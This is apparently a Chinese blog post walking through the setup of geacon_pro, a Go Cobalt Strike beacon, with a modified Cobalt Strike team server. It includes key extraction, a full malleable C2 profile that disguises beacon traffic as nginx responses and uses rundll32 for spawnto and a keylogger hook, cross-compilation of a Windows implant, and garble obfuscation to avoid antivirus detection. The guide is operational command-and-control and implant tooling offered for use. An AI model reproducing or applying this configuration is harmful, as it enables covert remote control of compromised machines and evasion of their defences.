geacon_pro快速上手

前言

过不了360
本文主要记录一下使用二改的cobaltstrike配合geacon_pro的简单配置过程放链接：

• https://github.com/H4de5-7/geacon_pro
• https://github.com/TryGOTry/CobaltStrike_Cat_4.5

正文

CobaltStrike_Cat_4.5 配置

首先安装相应版本的jdk

sudo apt install openjdk-11-jre-headless
sudo apt install openjdk-11-jdk

然后配置CatClient.properties，这个没啥好说的，都有相关提示说明，然后直接运行teamserver就行，基本做到了傻瓜化。

geacon_pro配置

配置公钥

用到的工具BeaconTool.jar，需要注意运行这个工具需要使用jdk1.8,运行过一次cs的服务端之后，会在同目录生成.cobaltstrike.beacon_keys文件，建议将此文件复制一份到本地，我这里将文件重命名为了1111,运行以下命令就可以获取公钥：

java -jar .\BeaconTool.jar -i .\1111 -rsa

替换到geacon_pro项目的config/config.go,这里注意一下不能有多余的空格，不然会报错，如下：

修改c2地址

下面的c2的ip和端口先在cs里面新建一个https的listen，然后填入即可

适配C2profile

提供的配置文件

# default sleep time is 60s
set sleeptime "3000";
set jitter "7";

https-certificate {
    set C "KZ";
    set CN "foren.zik";
    set O "NN Fern Sub";
    set OU "NN Fern";
    set ST "KZ";
    set validity "365";
}

# define indicators for an HTTP GET
http-get {

	set uri "/www/handle/doc";

	client {
		#header "Host" "aliyun.com";
		# base64 encode session metadata and store it in the Cookie header.
		metadata {
			base64url;
			prepend "SESSIONID=";
			header "Cookie";
		}
	}

	server {
		# server should send output with no changes
		#header "Content-Type" "application/octet-stream";
		header "Server" "nginx/1.10.3 (Ubuntu)";
    		header "Content-Type" "application/octet-stream";
        	header "Connection" "keep-alive";
        	header "Vary" "Accept";
        	header "Pragma" "public";
        	header "Expires" "0";
        	header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

		output {
			mask;
			netbios;
			prepend "data=";
			append "%%";
			print;
		}
	}
}

# define indicators for an HTTP 
http-post {
	# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
	set uri "/IMXo";
	client {
		#header "Content-Type" "application/octet-stream";				

		# transmit our session identifier as /submit.php?id=[identifier]
		
		id {				
			mask;
			netbiosu;
			prepend "user=";
			append "%%";
			header "User";
		}

		# post our output with no real changes
		output {
			mask;
			base64url;
			prepend "data=";
			append "%%";		
			print;
		}
	}

	# The server's response to our HTTP POST
	server {
		header "Server" "nginx/1.10.3 (Ubuntu)";
    		header "Content-Type" "application/octet-stream";
        	header "Connection" "keep-alive";
       	 	header "Vary" "Accept";
        	header "Pragma" "public";
        	header "Expires" "0";
        	header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

		# this will just print an empty string, meh...
		output {
			mask;
			netbios;
			prepend "data=";
			append "%%";
			print;
		}
	}
}

post-ex {
    set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
    set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";
    
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
    set keylogger "SetWindowsHookEx";
}

修改 CatServer.properties指定为刚刚创建的c2.profile

修改客户端的相关选项为false

编译运行

在Linux下面编译运行

CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go

高级配置

使用https://github.com/burrowers/garble进行混淆，混淆是在Windows下面进行，并且使用的是cmd。

go install mvdan.cc/garble@latest
set GO111MODULE=on
go get mvdan.cc/garble
garble.exe build

修改aes iv，在config.go修改完记得在CatServer.properties也修改一下

修改CatServer.properties版本和端口，尽量高端口